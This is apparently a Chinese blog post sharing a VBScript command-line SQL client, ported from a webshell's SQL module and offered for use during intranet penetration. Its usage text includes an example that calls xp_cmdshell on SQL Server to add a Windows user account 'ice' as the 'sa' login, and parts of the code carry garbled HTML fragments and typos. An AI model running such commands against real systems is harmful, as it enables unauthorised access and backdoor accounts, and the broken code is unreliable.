'代码源于海阳顶端2006的SQL模块,这里改成VBS版。功能和海阳顶端里面是一模一样的,用起来可能会没有ASP版的舒服,不过这个可以在DOS下用,方便渗透内网时用哈。

if (lcase(right(wscript.fullname,11))="wscript.exe") then
echo "Execute it under the cmd.exe Plz! Thx."
echo "code by lcx"
wscript.quit
end If

if
wscript.arguments.count<1 then
echo "Usage: cscript sql.vbs showTables e:\hytop.mdb或sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs;"
echo "usage: cscript sql.vbs query 连接字符串 <表名=default:""""> sql语句 <页数=default:1>"
echo "exp:cscript sql.vbs showTables "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)
echo
"exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"select * from name"&chr(34)&Space(1) & 1
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"update....."&chr(34)&Space(1) & 1
echo "exp:cscript sql.vbs query "&Chr(34)&"sql:Provider=SQLOLEDB.1;Server=localhost;User ID=sa;Password=haiyangtop;Database=bbs"&Chr(34)&Space(1) &Chr(34)&Chr(34)&Space(1)&Chr(34)&"exec master.dbo.xp_cmdshell 'net user ice hacker /add'--"&chr(34)&Space(1) & 1
end If

Sub
chkErr(Err)
If Err Then
echo "错误: " & Err.Description & "错误源: " & Err.Source & vbcrlf
Err.Clear
wscript.quit
End If
End Sub


Sub
echo(str)
wscript.echo str
End Sub

Function
fixNull(str)
If IsNull(str) Then
str = " "
End If
fixNull = str
End Function

Sub
showErr(str)
Dim i, arrayStr
arrayStr = Split(str,
"$$")
echo
"出错信息:"&vbcrlf
For i = 0 To UBound(arrayStr)
echo (i +
1) & ". " & arrayStr(i) & "
"
Next
echo vbcrlf
wscript.quit
End Sub

Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Rem 下面是程序模块选择部分
Rem =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-


PageMsDataBase()



Sub pageMsDataBase()
Dim theAct, sqlStr
theAct = Wscript.Arguments(
0)
sqlStr = Wscript.Arguments(
1)

Select Case theAct
Case "showTables"
showTables()
Case "query"
showQuery()

End Select

End Sub

Sub
showTables()

Dim conn, sqlStr, rsTable, rsColumn, connStr, tablesStr
sqlStr = Wscript.Arguments(
1)
If LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, olor="#800080">5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set
conn = CreateObject("Adodb.Connection")

conn.Open connStr
chkErr(Err)

tablesStr = getTableList(conn, sqlStr, rsTable)


echo tablesStr &
"================================================="


Do Until rsTable.Eof
Set rsColumn = conn.OpenSchema(4, Array(Empty, Empty, rsTable("Table_Name").value))
echo rsTable(
"Table_Name") &vbcrlf

Do Until rsColumn.Eof

echo
"字段名:" & rsColumn("Column_Name")&vbclrf
echo
"类型:" & getDataType(rsColumn("Data_Type")) & vbclrf
echo
"大小:" & rsColumn("Character_Maximum_Length") & vbclrf
echo
"精度:" & rsColumn("Numeric_Precision") & vbclrf
echo
"允许为空:" & rsColumn("Is_Nullable") & vbclrf
echo
"默认值:" & rsColumn("Column_Default") & vbclrf&vbclrf
rsColumn.MoveNext

Loop

rsTable.MoveNext
echo vbcrlf
Loop

echo "==============================================================="

conn.Close
Set conn = Nothing
Set
rsTable = Nothing
Set
rsColumn = Nothing
End Sub

Sub
showQuery()

Dim i, j, rs, sql, page, conn, sqlStr, connStr, rsTable, tablesStr, theTable

sqlStr = Wscript.Arguments(
1)
theTable = Wscript.Arguments(
2)
sql=Wscript.Arguments(
3)
page=Wscript.Arguments(
4)

If Not IsNumeric(page) or page = "" Then
page = 1
End If


If
LCase(Left(sqlStr, 4)) = "sql:" Then
connStr = Mid(sqlStr, 5)
Else
connStr = "Provider=Microsoft.Jet.Oledb.4.0;Data Source=" & sqlStr
End If
Set
rs = CreateObject("Adodb.RecordSet")
Set conn = CreateObject("Adodb.Connection")

conn.Open connStr
chkErr(Err)

tablesStr = getTableList(conn, sqlStr, rsTable)

echo
"数据库表结构查看:"
echo tablesStr & "========================================================"
echo ">SQL命令执行及查看<:"&vbcrlf
If sql <> "" And Left(LCase(sql), 7) = "select " Then
rs.Open sql, conn, 1, 1
chkErr(Err)
rs.PageSize =
20
If Not rs.Eof Then
rs.AbsolutePage = page
End If
If
rs.Fields.Count>0 Then
echo "SQL操作 - 执行结果"&vbcrlf
echo
"===================="&theTable&"列名如下========================================"
For j = 0 To rs.Fields.Count-1
echo rs.Fields(j).Name & vbcrlf
Next
For
i = 1 To 20
If rs.Eof Then
Exit For
End If


For
j = 0 To rs.Fields.Count-1
echo fixNull(rs(j))& vbcrlf
Next

rs.MoveNext
Next
End If
echo "================================================================="
echo " 共有"&rs.Fields.Count&"列" & vbcrlf
For i = 1 To rs.PageCount
page=i

Next
t>echo " 共有" & page & "页"
rs.Close
Else
If
sql <> "" Then
conn.Execute(sql)
chkErr(Err)
echo
"执行完毕!"&vbcrlf
End If
End If



conn.Close
Set rs = Nothing
Set
conn = Nothing
Set
rsTable = Nothing
End Sub

Function
getDataType(typeId)
Select Case typeId
Case 130
getDataType = "文本"
Case 2
getDataType = "整型"
Case 3
getDataType = "长整型"
Case 7
getDataType = "日期/时间"
Case 5
getDataType = "双精度型"
Case 11
getDataType = "是/否"
Case 128
getDataType = "OLE 对象"
Case Else
getDataType = typeId
End Select
End Function

Function
getTableList(conn, sqlStr, rsTable)
Set rsTable = conn.OpenSchema(20, Array(Empty, Empty, Empty, "table"))
echo
"存在以下表名:"
Do Until rsTable.Eof
getTableList = getTableList &
"["& rsTable("Table_Name") & "]"&vbcrlf
rsTable.MoveNext
Loop
rsTable.MoveFirst
End Function


 
目前有0条回应
Comment
Trackback
你目前的身份是游客,请输入昵称和电邮!